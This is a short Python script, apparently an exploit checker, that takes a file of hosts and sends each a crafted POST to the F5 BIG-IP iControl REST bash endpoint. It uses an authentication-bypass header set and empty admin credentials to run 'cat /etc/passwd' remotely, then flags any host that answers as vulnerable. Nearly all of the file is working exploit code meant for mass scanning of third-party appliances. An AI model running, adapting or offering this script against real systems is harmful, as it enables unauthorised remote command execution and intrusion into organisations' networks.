#!/usr/bin/python3
#Created by EvilLizard666
from requests.exceptions import HTTPError
from distutils.command.check import check
from email import message
from lzma import CHECK_UNKNOWN
from mailbox import Message
from this import s
import requests
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

hosts_file_to_scan = open(sys.argv[1], 'r')
headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
        'Content-Type': 'application/json',
        'Connection': 'keep-alive, x-F5-Auth-Token',
        'X-F5-Auth-Token': 'abc',
        'Authorization': 'Basic YWRtaW46'
    }

data = {'command': "run",'utilCmdArgs':"-c cat /etc/passwd"}
def testing():
    for i in hosts_file_to_scan.readlines():
        i = i.strip('\n')
        check_url = "https://" + i + ":8443" + "/mgmt/tm/util/bash"
        
        try:
            resp = requests.post(url=check_url, json=data, headers=headers, verify=False, timeout=3)
            if resp.status_code == 200 and "www-data" in resp.text:
               print("*********** [+] Host: " + i + " is vuln to cve ***********\n")
            else:
               print("---------- [-] Error Host: " + i + " is NOT vuln to cve ----------")
        except HTTPError as http_err:
            print("[-] Host: " + i + " Connection error 1\n")
            error1 = f'HTTP error occurred: {http_err}'  
        except Exception as err:
            error2 = f'Other error occurred: {err}'
            print("[-] Host: " + i + " Connection error 2\n")
        
        
   
testing()
